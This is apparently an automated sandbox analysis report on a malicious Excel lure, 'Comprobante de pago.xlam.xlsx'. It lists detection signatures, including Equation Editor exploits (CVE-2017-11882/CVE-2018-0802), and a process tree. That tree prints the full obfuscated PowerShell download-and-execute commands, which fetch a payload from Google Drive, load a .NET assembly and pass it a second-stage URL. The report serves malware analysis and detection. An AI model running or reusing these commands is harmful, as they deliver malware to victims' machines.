Windows Analysis Report
Comprobante de pago.xlam.xlsx
Overview
General Information
Detection

Score | Range | Whitelisted | Confidence
---|---|---|---
100 | 0 - 100 | false | 100%
Signatures
Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell Download and Execute IEX
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Document exploit detected (process start blacklist hit)
Installs new ROOT certificates
Obfuscated command line found
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Shellcode detected
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w7x64
- EXCEL.EXE (PID: 3412 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
- EQNEDT32.EXE (PID: 3620 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
- wscript.exe (PID: 3756 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaystuff.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)
- powershell.exe (PID: 3832 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCgoJ3h5cGltYWdlVXJsID0gVFg2aHR0cHM6Ly9kcml2ZS5nb29nbGUuJysnY28nKydtL3VjJysnP2V4cG9ydD1kb3dubG8nKydhZCZpZD0xLVdkZ2VxMGZYOWFBcGRsU1c5ZGxuMVBjX0tFR3BmSHAgVFg2O3h5cHdlYkNsaWVudCA9IE5ldy1PJysnYicrJ2plYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7eHlwaW1hZ2VCeXRlcyA9IHh5cHdlYkNsaWVudC5Eb3dubG9hZERhdGEoeHlwaW1hZ2VVcmwpO3h5cGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC4nKydFbmNvJysnZGluZ106OlVURjguR2V0U3RyaW5nKHh5cGltYWdlQicrJ3l0ZXMpO3h5cHN0YXJ0RmxhZyA9IFRYNjw8JysnQkFTRTY0X1NUQVJUPj5UWCcrJzY7eHlwZW5kRmxhZyA9IFRYNjw8JysnQkFTRTY0X0VORD4+VFg2O3h5cHN0YXJ0SScrJ25kZXggPSB4eXBpbWFnZVRleHQuSW5kZXgnKydPZih4eXBzdGFydEYnKydsYWcpO3gnKyd5cGVuZEluZGV4ID0geHlwaW0nKydhZ2VUZXh0LkluZGV4T2YoeHlwJysnZW5kRmxhZyk7eHlwc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHh5cGVuZEluZGV4JysnIC1ndCB4eXBzdGFydEluZGV4O3h5cHN0YXJ0SW5kZXggKz0gJysneHlwc3RhcnRGbGFnLkxlbmd0aDt4eXBiYXNlNjRMZW5ndGggPSB4JysneXBlbmRJbmRleCAtIHh5cHN0YXJ0SW5kZXg7eHlwYmFzZTY0Q29tbWFuZCA9IHh5cGltYWdlJysnVGV4dC5TdWJzdHJpbmcoeHlwc3RhcnRJbmRleCwgeHlwYmFzZTY0TGUnKyduZ3RoKScrJzt4eXBiYXNlNicrJzRSZXZlcnNlZCA9IC1qb2luICh4eXBiYXNlNjRDb21tYW5kLlRvQ2hhckEnKydycmF5KCkgV1ZvIEZvckVhY2gtJysnT2JqZWN0IHsgeHlwXyB9KVstMS4uLSh4eXBiJysnYXNlNjRDb21tYW5kLkxlbmd0aCldO3h5cGNvbW1hbmRCeXRlcycrJyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoeHlwYmFzZTY0UmV2ZXJzZWQpO3h5cGxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh4eXBjbycrJ21tYW5kQnl0ZXMpO3h5cHZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRobycrJ2QoVFg2VkFJVFg2KTt4eXB2YWlNZXRob2QuSW52b2tlKHh5cG51bGwsIEAoVFg2dHh0JysnLllBRFNFVVQvMjQxLjYxMi4zLjI5MS8vOnB0dGhUWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNkFkZEluUHJvY2VzczMyVFg2LCBUWDZkZXNhdGl2YWRvVFg2LCcrJyBUWDZkZXNhdGl2YWRvVFg2LFRYNicrJ1RYNixUWDZUWDYsVFg2VFg2LFRYNlRYNixUWDZUWDYsVFg2MVRYNikpOycpIC1DckVQbEFDRSAnV1ZvJyxbQ0hBUl0xMjQgIC1DckVQbEFDRSAgKFtDSEFSXTEyMCtbQ0hBUl0xMjErW0NIQVJdMTEyKSxbQ0hBUl0zNiAtQ3JFUGxBQ0UoW0NIQVJdODQrW0NIQVJdODgrW0NIQVJdNTQpLFtDSEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
- powershell.exe (PID: 3932 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex((('xypimageUrl = TX6https://drive.google.'+'co'+'m/uc'+'?export=downlo'+'ad&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp TX6;xypwebClient = New-O'+'b'+'jec'+'t System.Net.WebClient;xypimageBytes = xypwebClient.DownloadData(xypimageUrl);xypimageText = [System.Text.'+'Enco'+'ding]::UTF8.GetString(xypimageB'+'ytes);xypstartFlag = TX6<<'+'BASE64_START>>TX'+'6;xypendFlag = TX6<<'+'BASE64_END>>TX6;xypstartI'+'ndex = xypimageText.Index'+'Of(xypstartF'+'lag);x'+'ypendIndex = xypim'+'ageText.IndexOf(xyp'+'endFlag);xypstartIndex -ge 0 -and xypendIndex'+' -gt xypstartIndex;xypstartIndex += '+'xypstartFlag.Length;xypbase64Length = x'+'ypendIndex - xypstartIndex;xypbase64Command = xypimage'+'Text.Substring(xypstartIndex, xypbase64Le'+'ngth)'+';xypbase6'+'4Reversed = -join (xypbase64Command.ToCharA'+'rray() WVo ForEach-'+'Object { xyp_ })[-1..-(xypb'+'ase64Command.Length)];xypcommandBytes'+' = [System.Convert]::FromBase64String(xypbase64Reversed);xyploadedAssembly = [System.Reflection.Assembly]::Load(xypco'+'mmandBytes);xypvaiMethod = [dnlib.IO.Home].Ge'+'tMetho'+'d(TX6VAITX6);xypvaiMethod.Invoke(xypnull, @(TX6txt'+'.YADSEUT/241.612.3.291//:ptthTX6, TX6desativadoTX6, TX6desativadoTX6, TX6desativadoTX6, TX6AddInProcess32TX6, TX6desativadoTX6,'+' TX6desativadoTX6,TX6'+'TX6,TX6TX6,TX6TX6,TX6TX6,TX6TX6,TX61TX6));') -CrEPlACE 'WVo',[CHAR]124 -CrEPlACE ([CHAR]120+[CHAR]121+[CHAR]112),[CHAR]36 -CrEPlACE([CHAR]84+[CHAR]88+[CHAR]54),[CHAR]39))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
- cleanup
No configs have been found.
Source | Rule | Description | Author | Strings
---|---|---|---|---
|  | INDICATOR_XML_LegacyDrawing_AutoLoad_Document | detects AutoLoad documents using LegacyDrawing | ditekSHen |  |

Source | Rule | Description | Author | Strings
---|---|---|---|---
|  | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |  |
|  | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |  |
|  | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |  |
Exploits
Source: | Author: Joe Security
Source: | Author: Joe Security

System Summary
Source: | Author: Florian Roth (Nextron Systems)